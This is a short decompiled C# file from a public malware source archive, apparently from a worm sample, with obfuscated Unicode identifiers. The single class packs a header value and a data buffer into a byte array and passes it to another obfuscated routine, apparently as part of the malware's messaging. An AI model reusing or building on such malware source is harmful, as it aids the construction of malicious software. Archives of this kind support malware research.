mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
34 lines
1.1 KiB
C#
34 lines
1.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᛷḼဩ
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
internal class ᛷḼဩ\u09CF
|
|||
|
{
|
|||
|
public \u07F6\u181Fᒸৃ.ƪᆌቬኆ২ᇖࣩᄦ ୱڗ\u0D81ő\u0D70ᛮ;
|
|||
|
public byte[] \u108Aປ;
|
|||
|
|
|||
|
public ᛷḼဩ\u09CF(\u07F6\u181Fᒸৃ.ƪᆌቬኆ২ᇖࣩᄦ header, byte[] data)
|
|||
|
{
|
|||
|
this.ୱڗ\u0D81ő\u0D70ᛮ = header;
|
|||
|
this.\u108Aປ = data;
|
|||
|
}
|
|||
|
|
|||
|
public byte[] ᖣᅸڨฃ()
|
|||
|
{
|
|||
|
List<byte> byteList = new List<byte>();
|
|||
|
byteList.AddRange((IEnumerable<byte>) BitConverter.GetBytes((int) this.ୱڗ\u0D81ő\u0D70ᛮ));
|
|||
|
byteList.AddRange((IEnumerable<byte>) this.\u108Aປ);
|
|||
|
byte[] array = byteList.ToArray();
|
|||
|
byteList.Clear();
|
|||
|
return \u1928ᔾዔ.ᅀძṶၠ(array, true);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|